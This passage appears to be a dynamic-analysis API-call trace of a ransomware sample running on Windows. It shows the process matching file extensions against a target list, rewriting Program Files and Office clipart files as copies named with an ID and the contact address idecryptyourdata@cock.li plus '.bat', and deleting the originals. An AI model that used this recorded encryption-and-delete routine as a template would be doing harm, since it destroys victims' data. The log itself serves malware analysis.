returned 60 [0179.023] lstrlenW (lpString=".1cd") returned 4 [0179.023] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0179.023] lstrlenW (lpString=".jpg") returned 4 [0179.023] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0179.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0179.024] lstrlenW (lpString=".doc") returned 4 [0179.024] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.024] lstrlenW (lpString=".docx") returned 5 [0179.024] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0179.024] lstrlenW (lpString=".pdf") returned 4 [0179.024] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.024] lstrlenW (lpString=".xls") returned 4 [0179.024] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.024] lstrlenW (lpString=".xlsx") returned 5 [0179.024] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0179.024] lstrlenW (lpString=".ppt") returned 4 [0179.024] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0179.024] lstrlenW (lpString=".zip") returned 4 [0179.024] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.024] lstrlenW (lpString=".rar") returned 4 [0179.024] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.024] lstrlenW (lpString=".bz2") returned 4 [0179.024] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.024] lstrlenW (lpString=".7z") returned 3 [0179.024] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0179.024] lstrlenW (lpString=".dbf") returned 4 [0179.024] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0179.024] lstrlenW (lpString=".1cd") returned 4 [0179.024] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 60 [0179.024] lstrlenW (lpString=".jpg") returned 4 [0179.025] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.025] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.025] lstrlenW (lpString="ipscat.xml") returned 10 [0179.025] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.025] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=2592) returned 1 [0179.025] CloseHandle (hObject=0x340) returned 1 [0179.026] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml")) returned 0x20 [0179.026] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.026] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml") returned 61 [0179.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml") returned 61 [0179.026] lstrlenW (lpString=".doc") returned 4 [0179.026] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.026] lstrlenW (lpString=".docx") returned 5 [0179.026] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0179.026] lstrlenW (lpString=".pdf") returned 4 [0179.026] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.026] lstrlenW (lpString=".xls") returned 4 [0179.026] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.026] lstrlenW (lpString=".xlsx") returned 5 [0179.026] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0179.026] lstrlenW (lpString=".ppt") returned 4 [0179.026] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml") returned 61 [0179.026] lstrlenW (lpString=".zip") returned 4 [0179.026] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.027] lstrlenW (lpString=".rar") returned 4 [0179.027] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.027] lstrlenW (lpString=".bz2") returned 4 [0179.027] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.027] lstrlenW (lpString=".7z") returned 3 [0179.027] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.027] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.028] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.028] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.029] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.029] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.030] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.030] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.031] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.031] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.032] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.032] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.033] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.034] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.034] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.035] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.035] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.036] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.036] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.406] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml")) returned 0x20 [0179.406] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.407] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.990] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.990] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105306.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0179.990] GetLastError () returned 0x0 [0179.990] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x10e0, lpOverlapped=0x0) returned 1 [0181.311] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x10f0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x10f0, lpOverlapped=0x0) returned 1 [0181.312] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.313] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0181.313] SetEndOfFile (hFile=0x37c) returned 1 [0181.313] CloseHandle (hObject=0x37c) returned 1 [0181.313] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.313] SetEndOfFile (hFile=0x378) returned 1 [0181.314] CloseHandle (hObject=0x378) returned 1 [0181.314] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0181.314] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105306.wmf")) returned 1 [0181.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 68 [0181.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 68 [0181.315] lstrlenW (lpString=".doc") returned 4 [0181.315] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.315] lstrlenW (lpString=".docx") returned 5 [0181.315] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0181.315] lstrlenW (lpString=".pdf") returned 4 [0181.315] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.315] lstrlenW (lpString=".xls") returned 4 [0181.315] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.315] lstrlenW (lpString=".xlsx") returned 5 [0181.315] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0181.315] lstrlenW (lpString=".ppt") returned 4 [0181.315] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 68 [0181.315] lstrlenW (lpString=".zip") returned 4 [0181.316] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.316] lstrlenW (lpString=".rar") returned 4 [0181.316] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.316] lstrlenW (lpString=".bz2") returned 4 [0181.316] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.316] lstrlenW (lpString=".7z") returned 3 [0181.316] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 68 [0181.316] lstrlenW (lpString=".dbf") returned 4 [0181.316] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 68 [0181.316] lstrlenW (lpString=".1cd") returned 4 [0181.316] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 68 [0181.316] lstrlenW (lpString=".jpg") returned 4 [0181.316] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 68 [0181.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 68 [0181.316] lstrlenW (lpString=".doc") returned 4 [0181.316] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.316] lstrlenW (lpString=".docx") returned 5 [0181.316] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0181.316] lstrlenW (lpString=".pdf") returned 4 [0181.316] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.316] lstrlenW (lpString=".xls") returned 4 [0181.316] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.316] lstrlenW (lpString=".xlsx") returned 5 [0181.316] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0181.317] lstrlenW (lpString=".ppt") returned 4 [0181.317] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 68 [0181.317] lstrlenW (lpString=".zip") returned 4 [0181.317] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.317] lstrlenW (lpString=".rar") returned 4 [0181.317] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.317] lstrlenW (lpString=".bz2") returned 4 [0181.317] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.317] lstrlenW (lpString=".7z") returned 3 [0181.317] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 68 [0181.317] lstrlenW (lpString=".dbf") returned 4 [0181.317] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 68 [0181.317] lstrlenW (lpString=".1cd") returned 4 [0181.317] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 68 [0181.317] lstrlenW (lpString=".jpg") returned 4 [0181.317] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.318] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.318] lstrlenW (lpString="J0105328.WMF") returned 12 [0181.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0181.319] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=7992) returned 1 [0181.319] CloseHandle (hObject=0x378) returned 1 [0181.319] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf")) returned 0x220 [0181.319] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0181.319] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.319] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0181.320] GetLastError () returned 0x0 [0181.320] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1f38, lpOverlapped=0x0) returned 1 [0181.425] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1f40, lpOverlapped=0x0) returned 1 [0181.431] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.431] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0181.431] SetEndOfFile (hFile=0x37c) returned 1 [0181.432] CloseHandle (hObject=0x37c) returned 1 [0181.432] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.432] SetEndOfFile (hFile=0x378) returned 1 [0181.433] CloseHandle (hObject=0x378) returned 1 [0181.433] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0181.433] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf")) returned 1 [0181.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 68 [0181.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 68 [0181.433] lstrlenW (lpString=".doc") returned 4 [0181.433] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.433] lstrlenW (lpString=".docx") returned 5 [0181.433] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0181.434] lstrlenW (lpString=".pdf") returned 4 [0181.434] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.434] lstrlenW (lpString=".xls") returned 4 [0181.434] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.434] lstrlenW (lpString=".xlsx") returned 5 [0181.434] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0181.434] lstrlenW (lpString=".ppt") returned 4 [0181.434] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 68 [0181.434] lstrlenW (lpString=".zip") returned 4 [0181.434] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.434] lstrlenW (lpString=".rar") returned 4 [0181.434] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.434] lstrlenW (lpString=".bz2") returned 4 [0181.434] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.434] lstrlenW (lpString=".7z") returned 3 [0181.434] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 68 [0181.434] lstrlenW (lpString=".dbf") returned 4 [0181.434] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 68 [0181.434] lstrlenW (lpString=".1cd") returned 4 [0181.434] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 68 [0181.434] lstrlenW (lpString=".jpg") returned 4 [0181.434] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 68 [0181.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 68 [0181.434] lstrlenW (lpString=".doc") returned 4 [0181.434] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.434] lstrlenW (lpString=".docx") returned 5 [0181.435] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0181.435] lstrlenW (lpString=".pdf") returned 4 [0181.435] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.435] lstrlenW (lpString=".xls") returned 4 [0181.435] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.435] lstrlenW (lpString=".xlsx") returned 5 [0181.435] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0181.435] lstrlenW (lpString=".ppt") returned 4 [0181.435] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 68 [0181.435] lstrlenW (lpString=".zip") returned 4 [0181.435] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.435] lstrlenW (lpString=".rar") returned 4 [0181.435] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.435] lstrlenW (lpString=".bz2") returned 4 [0181.435] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.435] lstrlenW (lpString=".7z") returned 3 [0181.435] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 68 [0181.435] lstrlenW (lpString=".dbf") returned 4 [0181.435] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 68 [0181.435] lstrlenW (lpString=".1cd") returned 4 [0181.435] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 68 [0181.435] lstrlenW (lpString=".jpg") returned 4 [0181.435] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.436] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.436] lstrlenW (lpString="J0105348.WMF") returned 12 [0181.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0181.436] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=17060) returned 1 [0181.436] CloseHandle (hObject=0x378) returned 1 [0181.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf")) returned 0x220 [0181.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0181.437] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.437] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0181.437] GetLastError () returned 0x0 [0181.437] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x42a4, lpOverlapped=0x0) returned 1 [0181.597] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x42b0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x42b0, lpOverlapped=0x0) returned 1 [0181.599] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.599] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0181.599] SetEndOfFile 